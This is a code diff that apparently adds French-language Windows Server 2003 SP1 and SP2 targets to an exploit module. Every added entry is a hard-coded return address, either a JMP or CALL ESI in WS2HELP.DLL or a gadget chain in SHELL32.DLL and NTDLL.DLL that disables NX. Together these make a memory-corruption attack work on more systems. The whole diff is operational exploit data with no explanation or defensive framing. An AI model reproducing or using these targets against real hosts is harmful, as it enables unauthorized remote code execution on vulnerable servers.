@@ -621,6 +621,26 @@ def initialize(info = {})
621621 'Scratch' => 0x00020408 ,
622622 }
623623 ] ,
624+ # Standard return-to-ESI without NX bypass
625+ # Added by Omar MEZRAG - 0xFFFFFF
626+ [ 'Windows 2003 SP1 French (NO NX)' ,
627+ {
628+ 'Ret' => 0x71ac1c40 ,
629+ 'Scratch' => 0x00020408
630+ }
631+ ] , # JMP ESI WS2HELP.DLL
632+
633+ # Brett Moore's crafty NX bypass for 2003 SP1
634+ # Added by Omar MEZRAG - 0xFFFFFF
635+ [ 'Windows 2003 SP1 French (NX)' ,
636+ {
637+ 'RetDec' => 0x7CA2568C , # dec ESI, ret @SHELL32.DLL
638+ 'RetPop' => 0x7CB47CF4 , # push ESI, pop EBP, ret 4 @SHELL32.DLL
639+ 'JmpESP' => 0x7C98FED3 , # jmp ESP @NTDLL.DLL
640+ 'DisableNX' => 0x7C95E413 , # NX disable @NTDLL.DLL
641+ 'Scratch' => 0x00020408
642+ }
643+ ] ,
624644
625645 # Standard return-to-ESI without NX bypass
626646 [ 'Windows 2003 SP2 English (NO NX)' ,
@@ -697,6 +717,26 @@ def initialize(info = {})
697717 'Scratch' => 0x00020408
698718 }
699719 ] , # JMP ESI WS2HELP.DLL
720+ # Standard return-to-ESI without NX bypass
721+ # Added by Omar MEZRAG - 0xFFFFFF
722+ [ 'Windows 2003 SP2 French (NO NX)' ,
723+ {
724+ 'Ret' => 0x71AC2069 ,
725+ 'Scratch' => 0x00020408
726+ }
727+ ] , # CALL ESI WS2HELP.DLL
728+
729+ # Brett Moore's crafty NX bypass for 2003 SP2
730+ # Added by Omar MEZRAG - 0xFFFFFF
731+ [ 'Windows 2003 SP2 French (NX)' ,
732+ {
733+ 'RetDec' => 0x7C98BEB8 , # dec ESI, ret @NTDLL.DLL
734+ 'RetPop' => 0x7CB3E84E , # push ESI, pop EBP, ret @SHELL32.DLL
735+ 'JmpESP' => 0x7C98A01B , # jmp ESP @NTDLL.DLL
736+ 'DisableNX' => 0x7C95F517 , # NX disable @NTDLL.DLL
737+ 'Scratch' => 0x00020408
738+ }
739+ ] ,
700740
701741 #
702742 # Missing Targets